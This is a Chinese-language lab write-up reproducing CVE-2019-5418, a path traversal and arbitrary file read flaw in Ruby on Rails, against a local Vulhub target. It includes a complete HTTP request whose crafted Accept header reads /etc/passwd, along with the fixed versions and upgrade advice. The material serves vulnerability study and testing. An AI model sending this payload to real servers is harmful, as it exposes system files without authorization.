一、漏洞簡(jiǎn)介
1. 漏洞簡(jiǎn)介
Ruby on Rails使用了指定參數(shù)的render file來(lái)渲染應(yīng)用之外的視圖,且會(huì)根據(jù)用戶傳入的Accept頭來(lái)確定文件具體位置。我們可以通過(guò)修改訪問(wèn)某控制器的請(qǐng)求包,通過(guò)…/…/…/…/來(lái)達(dá)到路徑穿越的目的,然后再通過(guò){{來(lái)閉合模板查詢路徑,那我們?cè)L問(wèn)的文件會(huì)被當(dāng)做外部模板來(lái)解析。
2. 危害等級(jí)
高
3. 影響范圍
Rails全版本
其中修復(fù)版本:
6.0.0.beta3
5.2.2.1
5.1.6.2
5.0.7.2
4.2.11.1
二、 復(fù)現(xiàn)環(huán)境
靶機(jī)(搭建的Vulhub漏洞測(cè)試靶場(chǎng)):192.168.15.15
攻擊機(jī)(kali):192.168.15.131
Vulhub漏洞測(cè)試靶場(chǎng)的搭建可參考:Vulhub漏洞測(cè)試靶場(chǎng)搭建
三、復(fù)現(xiàn)過(guò)程
1. 啟動(dòng)漏洞環(huán)境
使用Vulhub啟動(dòng)漏洞環(huán)境
2. 驗(yàn)證漏洞環(huán)境
訪問(wèn)鏈接:http:192.168.15.15:3000 出現(xiàn)以下界面證明環(huán)境搭建成功。
3. 漏洞復(fù)現(xiàn)
訪問(wèn)http://192.168.15.15:3000/robots可見(jiàn),正常的robots.txt文件被讀取出來(lái)。
利用漏洞,使用burpsuite修改Accept參數(shù)進(jìn)行文件讀取,讀取/etc/passwd:
GET /robots HTTP/1.1
Host: your-ip:3000
Accept-Encoding: gzip, deflate
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
成功讀取到/etc/passwd文件,漏洞復(fù)現(xiàn)成功。
4. 關(guān)閉漏洞環(huán)境
使用完漏洞環(huán)境后記得及時(shí)關(guān)閉漏洞環(huán)境。docker-compose down
文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-441071.html
四、修復(fù)建議
使用已經(jīng)修復(fù)該漏洞的版本。文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-441071.html
到了這里,關(guān)于【漏洞復(fù)現(xiàn)】Ruby on Rails 路徑穿越與任意文件讀取漏洞(CVE-2019-5418)的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!